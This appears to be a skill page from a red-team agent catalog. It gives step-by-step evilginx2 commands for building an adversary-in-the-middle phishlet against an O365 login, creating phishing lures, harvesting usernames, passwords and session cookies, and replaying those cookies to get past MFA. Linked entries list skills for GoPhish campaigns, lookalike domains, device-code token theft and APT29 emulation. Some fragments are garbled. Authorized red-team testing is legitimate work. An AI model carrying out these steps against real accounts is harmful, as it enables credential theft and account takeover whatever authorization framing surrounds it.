Menu
Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft.
| name | evilginx2-proxy |
| description | Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft. |
| metadata | {"subdomain":"phishing","when_to_use":"evilginx2, mfa bypass, session cookie capture, reverse proxy phishing, phishlet, adversary in the middle, aitm","mitre_attack":["T1566.002","T1557","T1539","T1111"],"tags":["phishing","evilginx","mfa-bypass","aitm"]} |
When the target enforces MFA, a static fake login page is useless — you need the authenticated session cookie. evilginx2 is an adversary-in-the-middle reverse proxy: the victim authenticates against the real site through your proxy, MFA included, and you capture the resulting session token for replay.
lookalike-domain).lure-deconfliction handshake COMPLETE.# DNS + cert: evilginx manages Let's Encrypt automatically
evilginx2 -p /opt/evilginx/phishlets
# in the evilginx console:
config domain login.acme-portal.example
config ipv4 <sandbox-ip>
phishlets hostname o365 login.acme-portal.example
phishlets enable o365
lures create o365
lures get-url 0 # -> the link you put in the GoPhish email
A phishlet is a YAML map of the target's auth hosts, the sub_filters
that rewrite the real domain to yours in responses, and the
auth_tokens (which cookies signal a completed login). Capture a
normal login in a proxy, identify the session cookie(s) the app sets
post-MFA, and list them under auth_tokens. Keep ACME challenge paths
off the proxied auth path.
# evilginx console: list captured sessions
sessions
sessions <id> # shows username, password, and the tokens (cookie JSON)
Import the captured cookie JSON into a clean browser profile / a
Cookie header to ride the authenticated session without
re-triggering MFA.
Captured session → Credential node (type session-token) linked to
the User node with the lure id. Save the session JSON under
evidence/phisher/<id>-session.json. Note the estimated token TTL.
evidence/ +
the knowledge graph, never anywhere off-box.evilginx_disable_phishlet (phishlets disable o365) returns 502 on
a SOC stop request.Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling.
Register and provision a lookalike / Punycode phishing domain with DNS and TLS so GoPhish and evilginx2 lures resolve and pass modern mail + browser checks.
Harvest and replay O365 / Entra ID access via the OAuth device-code flow and captured tokens (TokenTactics-style), skipping the password + MFA prompts.
Design a credible phishing pretext and target shortlist from OSINT before any campaign is built — sender persona, scenario, timing, and the minimal target set.
Phishing / social-engineering catalog for the Phisher agent. Use ONLY when the engagement RoE authorizes a phishing engagement. Covers pretext design, GoPhish campaigns, evilginx2 MFA-bypass proxying, O365 credential/token harvest, lookalike domains, and the mandatory blue-team deconfliction handshake.
APT29 (Cozy Bear / Midnight Blizzard, SVR) adversary-emulation playbook — malware-light cloud-identity espionage: no-MFA password spray, OAuth consent/token abuse, Golden SAML, mailbox collection over residential proxies. Use when emulating APT29 against an M365/Entra/AWS-identity estate. Triggers on: 'emulate APT29', 'Cozy Bear', 'Midnight Blizzard', 'NOBELIUM', 'OAuth abuse', 'cloud identity espionage', 'Golden SAML'.